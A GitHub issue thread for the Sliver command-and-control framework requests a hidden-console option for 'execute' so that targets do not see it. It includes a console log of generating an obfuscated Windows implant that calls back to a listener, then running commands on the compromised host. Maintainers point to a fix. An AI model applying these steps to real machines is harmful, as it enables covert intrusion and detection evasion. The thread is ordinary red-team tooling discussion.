### ISSUE TITLE
Add a hidden flag when running sliver 'execute' command to make the console hidden

### ISSUE THREAD

**Issue by U53RW4R3** [BishopFox/sliver#1204]
**Is your feature request related to a problem? Please describe.**
When I use `execute` the console will popup from the target's view which is bad OPSEC.

**Describe the solution you'd like**
It would be great if sliver `execute` command has a hidden feature to hide the console from the target's machine.

In `meterpreter` you can do this:
```
metepreter > execute -Hicf ping -a "-n 10 10.0.4.4"
```

**Describe alternatives you've considered**
Using a `nopowershell` aka `nps` sliver armory will get the job done but I would rather stick with the native commands. I know `shell` is great but security solutions have a way to detect it easily.

**Additional context**

```
sliver > mtls

[*] Starting mTLS listener ...

[*] Successfully started job #1

sliver > generate -m 10.0.4.5:8888 -s ~/Documents/Webserver/shell.exe

[*] Generating new windows/amd64 implant binary
[*] Symbol obfuscation is enabled
[*] Build completed in 46s
[*] Implant saved to /home/user/Documents/Webserver/shell.exe

[*] Session 483bb0c1 ARCHITECTURAL_SKIN - 10.0.4.4:49760 (DESKTOP-CT1PSA8) - windows/amd64 - Mon, 17 Apr 2023 19:47:37 EDT

sliver > use 483bb0c1-c943-43dd-8772-82e04f9735cc

[*] Active session ARCHITECTURAL_SKIN (483bb0c1-c943-43dd-8772-82e04f9735cc)

sliver (ARCHITECTURAL_SKIN) > execute -o whoami

[*] Output:
desktop-ct1psa8\aiden

sliver (ARCHITECTURAL_SKIN) > execute -o ping -n 10 10.0.4.4

[*] Output:

Pinging 10.0.4.4 with 32 bytes of data:
Reply from 10.0.4.4: bytes=32 time<1ms TTL=128
Reply from 10.0.4.4: bytes=32 time<1ms TTL=128
Reply from 10.0.4.4: bytes=32 time<1ms TTL=128
Reply from 10.0.4.4: bytes=32 time<1ms TTL=128
Reply from 10.0.4.4: bytes=32 time<1ms TTL=128
Reply from 10.0.4.4: bytes=32 time<1ms TTL=128
Reply from 10.0.4.4: bytes=32 time<1ms TTL=128
Reply from 10.0.4.4: bytes=32 time<1ms TTL=128
Reply from 10.0.4.4: bytes=32 time<1ms TTL=128
Reply from 10.0.4.4: bytes=32 time<1ms TTL=128

Ping statistics for 10.0.4.4:
    Packets: Sent = 10, Received = 10, Lost = 0 (0% loss),
Approximate round trip times in milli-seconds:
    Minimum = 0ms, Maximum = 0ms, Average = 0ms
```
Here's a screenshot:

![github-issue](https://user-images.githubusercontent.com/98839705/232635610-71a3b785-9521-4396-a0ea-9f07aa3cf8b8.png)

**Comment by RafBishopFox** [comment]
@U53RW4R3 - You should be good to go with #1301. Give it a shot and if it does not work as expected, please let me know.

**Comment by moloch--** [comment]
@U53RW4R3 this fix will be included in the 1.6 release, and hasn't been included in a stable release (yet)
